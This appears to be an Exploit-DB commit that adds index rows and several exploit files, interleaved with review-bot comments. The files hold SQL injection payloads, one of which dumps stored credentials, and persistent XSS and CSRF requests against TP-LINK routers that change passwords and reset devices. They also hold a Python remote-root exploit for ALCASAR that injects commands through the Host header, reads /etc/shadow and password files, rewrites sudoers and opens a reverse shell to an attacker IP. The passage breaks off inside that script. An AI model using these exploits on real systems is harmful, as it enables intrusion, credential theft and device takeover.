Updated 09_11_2014

This commit is contained in:
Offensive Security 2014-09-11 04:44:07 +00:00
parent 38f34a5333
commit afeaf30889
19 changed files with 3024 additions and 1 deletions


@ -3143,7 +3143,7 @@ id,file,description,date,author,platform,type,port
3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln",2007-03-15,WiLdBoY,asp,webapps,0
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0
3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0
@ -31137,5 +31137,23 @@ id,file,description,date,author,platform,type,port
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross Site Scripting",2014-09-08,smash,php,webapps,80
34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80
34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0
34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0
34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0
34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
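Review bot: The new index row at L33 files entry 34588 under `platforms/aix/dos/34588.txt` with platform `aix` and type `dos`, but the advisory it points to describes XSS, SQL injection and an upload weakness in the PHP scripts of a web application, which every comparable row in this hunk records as `php,webapps`; the path and both columns look misfiled and will mislead anyone filtering the index by platform or type. The row at L34 dates entry 34592 as 2014-09-09 while that file's own header states "8 September 2018", so one of the two should be corrected before the index is relied on.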


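--- a/platforms/aix/dos/34588.txt
+++ b/platforms/aix/dos/34588.txt
@@ -0,0 +1,189 @@
+# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
+# Date : 9-9-2014
+# Author : jsass
+?# Vendor Homepage: ?http://www.posnic.com/?
+# Software Link:? http://sourceforge.net/projects/stockmanagement/
+# Version: ?1.02
+# Tested on: kali linux
+# Twitter : @KwSecurity
+# Group : Q8 GRAY HAT TEAM
+#########################################################################################################
+XSS install.php
+code :
+if(isset($_REQUEST['msg'])) {
+$msg=$_REQUEST['msg'];
+echo "<p style=color:red>$msg</p>";
+}
+exploit :
+http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
+#########################################################################################################
+SQL INJECTION : stock.php
+code :
+include_once("init.php");
+$q = strtolower($_GET["q"]);
+if (!$q) return;
+$db->query("SELECT * FROM stock_avail where quantity >0 ");
+while ($line = $db->fetchNextObject()) {
+if (strpos(strtolower($line->name), $q) !== false) {
+echo "$line->name\n";
+}
+}
+exploit :
+localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
+#########################################################################################################
+SQL INJECTION : view_customers.php
+code :
+$SQL = "SELECT * FROM customer_details";
+if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
+{
+$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
+}
+exploit :
+http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
+POST
+searchtxt=1(inject)&Search=Search
+searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
+#########################################################################################################
+SQL INJECTION : view_product.php
+code :
+if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
+$limit=$_GET['limit'];
+$_GET['limit']=10;
+}
+$page = $_GET['page'];
+if($page)
+$start = ($page - 1) * $limit; //first item to display on this page
+else
+$start = 0; //if no page var is given, set start to 0
+/* Get data. */
+$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
+if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
+{
+$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
+}
+$result = mysql_query($sql);
+exploit :
+localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
+and
+localhost/demo/POSNIC1.02DesignFix/view_product.php
+post
+searchtxt=a(inject)&Search=Search
+#########################################################################################################
+UPLOAD : logo_set.php
+code :
+<?php if(isset($_POST['submit'])){
+$allowedExts = array("gif", "jpeg", "jpg", "png");
+$temp = explode(".", $_FILES["file"]["name"]);
+$extension = end($temp);
+if ((($_FILES["file"]["type"] == "image/gif")
+|| ($_FILES["file"]["type"] == "image/png"))
+&& ($_FILES["file"]["size"] < 20000)
+&& in_array($extension, $allowedExts))
+{
+if ($_FILES["file"]["error"] > 0)
+{
+echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
+}
+else
+{
+$upload= $_FILES["file"]["name"] ;
+$type=$_FILES["file"]["type"];
+exploit :
+http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
+#########################################################################################################
+AND MORE BUGS
+Bye
+#########################################################################################################
+Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
+sec4ever.com & alm3refh.com
+#########################################################################################################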
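Review bot: The `stock.php` section at L71–L83 is labelled SQL injection, but the quoted code only uses `$q` in a `strpos` comparison against rows returned by the fixed query at L76, so nothing in the excerpt shows user input reaching SQL; the same applies to the `limit` vector at L117, which the `is_numeric` guard at L100 rejects for the example value, and to `logo_set.php`, whose excerpt ends before any file is written. Only the `searchtxt` concatenations at L90 and L113 are actually demonstrated by the code shown, and the text should either add the missing code or drop the unsupported claims. The title's `Vulnerabilty` is a misspelling, the `aix/dos` path does not fit a PHP web-application advisory, and the stray `?` characters in L55–L57 look like mis-decoded non-breaking spaces.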


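--- a/platforms/hardware/webapps/34583.txt
+++ b/platforms/hardware/webapps/34583.txt
@@ -0,0 +1,183 @@
+#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
+#Date: 01.07.14
+#Vendor: TP-LINK
+#Affected versions: TL-WR340G/TL-WR340GD
+#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
+#Contact: smash [at] devilteam.pl
+Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
+Config file - 192.168.1.1/userRpm/config.bin
+#1 - Cross Site Scripting
+a) Persistent XSS in Network > WAN Settings
+Vulnerable parameter - hostName.
+Request:
+GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
+Host: 192.168.1.1
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+<SCRIPT language="javascript" type="text/javascript">
+var dhcpInf = new Array(
+1,
+(...)
+"</script><script>alert(123)</script>",
+0,0 );
+</SCRIPT>
+(...)
+b) Persitent XSS in Wireless Settings
+Vulnerable parameter - ssid.
+Request:
+GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+<SCRIPT language="javascript" type="text/javascript">
+var wlanPara = new Array(
+5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
+0,0 );
+</SCRIPT>
+(...)
+c) Persistent XSS in DHCP Settings
+Vulnerable parameter - domain.
+Request:
+GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+<SCRIPT language="javascript" type="text/javascript">
+var DHCPPara = new Array(
+1,
+"192.168.1.100",
+"192.168.1.199",
+120,
+"0.0.0.0",
+"</script><xssed>'\"",
+"0.0.0.0",
+"0.0.0.0",
+1,
+1,
+0,0 );
+</SCRIPT>
+(...)
+d) Persitent XSS in Security > Domain Filtering
+Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
+Request:
+GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
+Host: 192.168.1.1
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+<SCRIPT language="javascript" type="text/javascript">
+var domainFilterList = new Array(
+"0000-2400", "hm</script><xssed>'\"", 1,
+0,0 );
+</SCRIPT>
+(...)
+e) Persistent XSS in Dynamic DNS Settings
+Vulnerable parameters - username & cliUrl.
+Request:
+GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
+Host: 192.168.1.1
+Response:
+HTTP/1.1 200 OK
+Server: Router
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
+<SCRIPT language="javascript" type="text/javascript">
+var serInf = new Array(
+"",
+"",
+"</script><script>alert(123)</script>",
+0,
+0,
+2,
+2,
+0,
+1,
+0,0 );
+</SCRIPT>
+(...)
+#2 - CSRF
+a) Change LAN IP
+Parameter lanip stands for further ip.
+GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+b) Change remote managment settings
+GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
+Host: 192.168.1.1
+c) Clear syslog
+GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
+Host: 192.168.1.1
+d) Reboot device
+GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
+Host: 192.168.1.1
+e) Restore factory defaults (admin:admin)
+GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
+Host: 192.168.1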
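Review bot: The last request at L284–L285 ends with `Host: 192.168.1`, which disagrees with the `192.168.1.1` used by every other Host header in the file and looks truncated; it should read `Host: 192.168.1.1`. The wireless request at L186 contains `®ion=102` where `&region=102` was evidently HTML-entity-decoded during editing, so the line no longer reproduces the request it documents; the same corruption appears at L301 of 34584.txt. `Persitent` at L183 and L227 and `managment` at L161 and L274 are misspellings.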


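--- a/platforms/hardware/webapps/34584.txt
+++ b/platforms/hardware/webapps/34584.txt
@@ -0,0 +1,194 @@
+#Title: TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
+#Date: 30.06.14
+#Vendor: TP-LINK
+#Affected versions: TL-WR841N / TL-WR841ND
+#Tested on: Firmware Version - 3.13.27 Build 121101 Rel.38183n, Hardware Version - WR841N v8 00000000 [at] Linux
+#Contact: smash [at] devilteam.pl
+#1 - Reflected XSS in Wireless Settings
+Vulnerable parameters - ssid1, ssid2, ssid3, ssid4.
+Variables of ssid parameters are being included to wlanPara array. Because of poor filtration of those values, it is able to execute specific javascript command as shown below.
+While system log and config is being saved as local file (http://192.168.0.1/userRpm/SystemLog.txt & http://192.168.0.1/userRpm/config.bin), it is able to hjiack both via xss.
+Request:
+http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=ROUTERNAME</script><script>alert(123)</script>&ssid2=ROUTERNAME_2&ssid3=ROUTERNAME_3&ssid4=ROUTERNAME_4®ion=101&band=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+(...)
+<SCRIPT language="javascript" type="text/javascript">
+var wlanPara = new Array(
+0,8,0,"ROUTERNAME</script><script>alert(123)</script>",108,101,1,5,1,1,15,2,71,0,0,0,"cript>","ROUTERNAME_3","ROUTERNAME_4",691810163,0,0,0,"","",1,"",1,1,3,3,0,1,1,36,0,0,"","","","","","","","",1,"",0,"","",1,0,0,1,0,1,0,0 );
+</SCRIPT>
+#2 - Persistent XSS & CSRF in Wireless Security Settings
+Vulnerable parameter - pskSecret.
+Same as above, variable of pskSecret (password) is being included in javascript array. Because of no CSRF prevention, it is able to change the password by visiting url below. pskSecret value is responsible for further password.
+Request:
+http://192.168.0.1/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=2&pskCipher=3&pskSecret=test&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+<SCRIPT language="javascript" type="text/javascript">
+var wlanPara = new Array(
+8, 1, 3, "332", 1, 0, "", 1812, "", "</script><script>alert(123)</script>", 1, 0, 0, 1, 3, 0, 0, 0, 5, 0, 1, "", 1,
+0,0 );
+</SCRIPT>
+#3 - Persistent XSS & CSRF in Mail Settings
+Vulnerable parameters - FromAddr, ToAddr, SMTPAddr.
+Reason is the same.
+Request:
+http://192.168.0.1/userRpm/AutoEmailRpm.htm?FromAddr=test%40test.com&ToAddr=test1%40test.com&SMTPAddr=</script><script>alert(123)</script>&User=&Password=&VeriPass=&Save=Save
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+<SCRIPT language="javascript" type="text/javascript">
+var autoEmailConf = new Array(
+"test@test.com",
+"test1@test.com",
+"</script><script>alert(123)</script>",
+0,
+"",
+0,
+0,
+0,
+0,
+0,0 );
+</SCRIPT>
+It is able to steal system logs by forcing our victim to set our mail settings via csrf, then logs will be send after visiting address below:
+http://192.168.0.1/userRpm/SystemLogRpm.htm?doMailLog=2
+#4 - Persistent XSS & CSRF in Time Settings
+Vulnerable parameters - ntpA & ntpB.
+Request:
+http://192.168.0.1/userRpm/DateTimeCfgRpm.htm?timezone=0&month=7&day=1&year=2014&hour=2&minute=44&second=18&ntpA=</script><script>xssed<>&ntpB=&isTimeChanged=0&start_month=0&start_count=0&start_week=1&start_hour=0&end_month=0&end_count=0&end_week=1&end_hour=0&isDaylightSavingChanged=0&Save=Save
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+<SCRIPT language="javascript" type="text/javascript">
+var timeInf = new Array(
+7,
+1,
+2014,
+2,
+58,
+52,
+0,
+"</script>xssed<>",
+"0.0.0.0",
+2,
+2,
+0,
+2,
+10,
+1,
+0,
+3,
+0,
+0,
+0,0 );
+</SCRIPT>
+#5 - Persistent XSS & CSRF in Dynamic DNS settings
+Vulnerable parameters - username, password, cliUrl.
+Request:
+http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=</script><script>alert(123)</script>&pwd=password&cliUrl=&Save=Save
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+<SCRIPT language="javascript" type="text/javascript">
+var serInf = new Array(
+"</script><script>alert(123)</script>",
+"password",
+"",
+0,
+0,
+3,
+2,
+0,
+1,
+0,0 );
+</SCRIPT>
+#6 - Persistent XSS & CSRF in DHCP settings
+Vulnerable parameter - domain.
+Request:
+http://192.168.0.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&gateway=192.168.0.1&domain=</script>xssed<>&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save
+Response:
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+Content-Type: text/html
+WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
+<SCRIPT language="javascript" type="text/javascript">
+var DHCPPara = new Array(
+1,
+"192.168.0.100",
+"192.168.0.199",
+120,
+"192.168.0.1",
+"</script>xssed<>",
+"0.0.0.0",
+"0.0.0.0",
+1,
+0,0 );
+</SCRIPT>
+#7 - Other CSRF's
+a) Clear system logs
+http://192.168.0.1/userRpm/SystemLogRpm.htm?logType=0&logLevel=7&ClearLog=Clear+Log&selPage=1&Page=1
+b) Reboot device
+http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reboot
+c) Factory defaults reset (admin:admin)
+http://192.168.0.1/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore
+Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting.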
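Review bot: The request at L317 sends `pskSecret=test`, yet the response quoted at L326 shows `</script><script>alert(123)</script>` in the array, so the request/response pair in section #2 do not correspond and one of them should be replaced with the exchange that was actually captured. The `®ion=101` at L301 is `&region=101` after HTML-entity decoding and no longer reproduces the request as written. `hjiack` at L299 should be `hijack`.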

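--- a/platforms/linux/remote/34595.py
+++ b/platforms/linux/remote/34595.py
@@ -0,0 +1,213 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+####
+#
+# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability
+#
+# Author: eF
+# Date : 2014-02-10
+#
+#
+# db 88 ,ad8888ba, db ad88888ba db 88888888ba
+# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
+# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
+# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
+# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
+# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
+# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
+# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
+#
+#
+# ALCASAR is a free Network Access Controller which controls the Internet
+# consultation networks. It authenticates, attributes and protects users'
+# access regardless their connected equipment (PC, Pokédex, game console,
+# etc.).
+#
+#
+# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a
+# trivial vulnerability. In the "index.php" file:
+#
+# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
+# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
+#
+# By sending a specially crafted value in the "host" HTTP header, it is possible
+# to inject the exec() function in order to execute commands as Apache user.
+#
+# In addition, the Apache user is able to call sudo for these binaries:
+#
+# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
+# /usr/local/bin/alcasar-conf.sh
+# /usr/local/sbin/alcasar-mysql.sh
+# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
+# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
+# /usr/local/bin/alcasar-archive.sh
+# /usr/bin/radwho,/usr/sbin/chilli_query
+# /usr/local/sbin/alcasar-logout.sh
+# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
+# /usr/bin/openssl
+#
+# As a result, we can use /usr/bin/openssl to read a file as root:
+#
+# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
+#
+# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.):
+#
+# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
+#
+# In this exploit, I choose to modify the "sudoers" file.
+#
+# Note: this vulnerability has been discovered in less than 30 seconds.
+# Others vulnerabilities are still present. This code has never been audited...
+# The PHP code is dreadful and needs to be rewritten from scratch.
+#
+# Example (post-auth) in file acc/admin/activity.php:
+#
+# if (isset($_POST['action'])){
+# switch ($_POST['action']){
+# case 'user_disconnect' :
+# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]");
+#
+#
+# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less.
+#
+#
+# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh"
+#
+# [+] Hello, first here are some passwords for you:
+# Password to protect the boot menu (GRUB) : cV9eEz1g
+# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
+# Name and password of Mysql/mariadb user : radius / oRNln64j
+# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
+# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
+#
+# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7:::
+#
+# [...]
+#
+# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
+#
+# username value
+# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H.
+#
+# [-] whoami (should be apache):
+# uid=495(apache) gid=492(apache) groups=492(apache)
+#
+# [+] On the way to the uid 0...
+# [-] Got root?
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# [+] Your command Sir:
+# The Running version (2.8) is up to date
+#
+#
+####
+import sys, os, re, httplib
+class PWN_Alcasar:
+def __init__(self, host):
+self.host = host
+self.root = False
+def exec_cmd(self, cmd, output=False):
+tag = os.urandom(4).encode('hex')
+cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
+if self.root:
+cmd = 'sudo %s' % cmd
+headers = {
+'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n',''))
+}
+c = httplib.HTTPConnection(self.host)
+c.request('GET', '/index.php', '', headers)
+r = c.getresponse()
+data = r.read()
+c.close()
+if data.find(tag) != -1:
+m = re.search(r'%s, (.*)\s</div>' % tag, data)
+if m:
+data = m.group(1).decode('base64')
+if output:
+print data
+return data
+return None
+def read_file(self, filepath, output=True):
+return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output)
+def read_passwords(self):
+self.read_file('/root/ALCASAR-passwords.txt')
+self.read_file('/etc/shadow')
+self.read_file('/usr/local/etc/digest/key_all')
+self.read_file('/usr/local/etc/digest/key_admin')
+self.read_file('/usr/local/etc/digest/key_backup')
+self.read_file('/usr/local/etc/digest/key_manager')
+self.read_file('/usr/local/etc/digest/key_only_admin')
+self.read_file('/usr/local/etc/digest/key_only_backup')
+self.read_file('/usr/local/etc/digest/key_only_manager')
+alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
+if alcasar_mysql:
+m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
+if m:
+radiuspwd = m.group(1)
+sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
+self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
+def edit_sudoers(self):
+self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64')
+self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers')
+self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers')
+self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64')
+self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers')
+self.exec_cmd('sudo rm -f /tmp/sudoers*')
+self.root = True
+def reverse_shell(self, rip, rport='80'):
+payload = 'import socket,subprocess,os;'
+payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
+payload += 's.connect((\'%s\',%s));' % (rip, rport)
+payload += 'os.dup2(s.fileno(),0);'
+payload += 'os.dup2(s.fileno(),1);'
+payload += 'os.dup2(s.fileno(),2);'
+payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
+return self.exec_cmd('python -c "%s"' % payload)
+def usage():
+print 'Usage: %s host command (ip) (port)' % sys.argv[0]
+print ' "command" can be a shell command or "reverseshell"'
+sys.exit(0)
+if __name__ == '__main__':
+if len(sys.argv) < 3:
+usage()
+cmd = sys.argv[2]
+if cmd == 'reverseshell':
+if len(sys.argv) < 5:
+print '[!] Need IP and port for the reverse shell...'
+sys.exit(0)
+rip = sys.argv[3]
+rport = sys.argv[4] # 80 is a good one...
+exploit = PWN_Alcasar(sys.argv[1])
+print '[+] Hello, first here are some passwords for you:'
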